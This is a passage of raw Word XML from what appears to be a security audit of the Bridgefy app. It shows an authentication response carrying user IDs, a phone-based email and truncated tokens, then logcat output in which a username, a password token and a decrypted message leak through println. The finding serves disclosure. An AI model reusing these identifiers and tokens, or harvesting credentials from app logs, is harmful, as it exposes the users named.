        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="917" w:right="3596" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"kind"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"identitytoolkit#VerifyPasswordResponse"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"localId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"U309RRQIulX95ChRjWv16PqwFlp1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="917" w:right="4802" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"email"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="DE4F00"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>"+12064512559@bridgefy.app"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"displayName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Oscar"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="917" w:right="6324" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"idToken"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"eyJhbG[...]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"registered"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="917" w:right="4802" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"refreshToken"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"AOkPPW[...]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"expiresIn"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"3600"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Examples</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>leaked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>01-20 12:11:57.535</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4410</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4486 I System.out: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Username</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>58ac0b67-bb4f-459e-9b82-4b67c81abf3c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="40"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>eyJhbGciOi[...] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>01-20 12:39:08.003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>6049</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>6049 I System.out: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Decrypted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"senderFirebaseId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"YIMqR4PaviUth9kCZ88BA2XMLbn1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"senderName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"rodrigo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cabez"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"senderNickname"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"rcabez"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"senderAvatar"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:1,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"receiverFirebaseId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"5ZCxNZV6psRwknk 6w9B9brLcZxw2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"receiverName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"userand"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"receiverNickname"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"userandnock"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"receiverAvata r"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:1,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"message"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"hvvjv"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"createdOn"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:1674236345800,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"status"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:1,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"dateSent"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:1674236345800}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="2565" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
